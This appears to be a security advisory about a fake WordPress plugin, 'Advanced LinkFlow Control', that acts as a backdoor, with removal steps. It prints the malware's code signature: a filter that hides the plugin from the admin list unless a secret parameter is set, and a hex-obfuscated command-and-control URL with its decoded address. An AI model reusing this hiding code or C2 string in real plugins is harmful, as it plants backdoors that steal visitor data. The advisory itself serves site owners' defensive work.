Advanced LinkFlow Control v1.2.5
/advanced-linkflow-control/
Quick Answer
If you discovered the "Advanced LinkFlow Control" plugin in your WordPress files, your site is infected with a stealth backdoor. This malware hides itself from the admin dashboard, clears cache plugins to persist, and secretly exfiltrates visitor data to a remote server. You must delete the advanced-linkflow-control folder immediately.
Threat Behavior & Purpose
Disguises itself as a utility plugin, hides from the WordPress admin list, and acts as a backdoor to exfiltrate visitor data (IPs, User Agents). It also clears caching plugins to persist injected SEO spam and cloaks content from search engines.
Main File
advanced-linkflow-control.php
Fake Author
Full Installation Path
wp-content/plugins/advanced-linkflow-control/advanced-linkflow-control.php
Malware Family
SEO SpamMalicious Code Signature
If you find the following code signature in your files, your site is compromised:
add_filter('all_plugins', function ($plugins) {
if (isset($_GET['sp'])) {
return $plugins;
}
$current = plugin_basename(__FILE__);
unset($plugins[$current]);
return $plugins;
});
// Decoded C2 Server
private $server_url = "\x68\x74\x74\x70:\x2f/\x77h\x74a\x73f\x64e\x2ei\x63u\x2fg\x65t\x2ep\x68p"; // http://whatsdf.icu/get.php
Removal Protocol
- Access your server’s file system via FTP or File Manager.
- Navigate to `wp-content/plugins/`.
- Locate and completely delete the `advanced-linkflow-control` folder to eliminate the backdoor.
- Verify the removal by ensuring no related active processes remain and checking your `wp-options` for any leftover transients.
Evidence & Screenshots
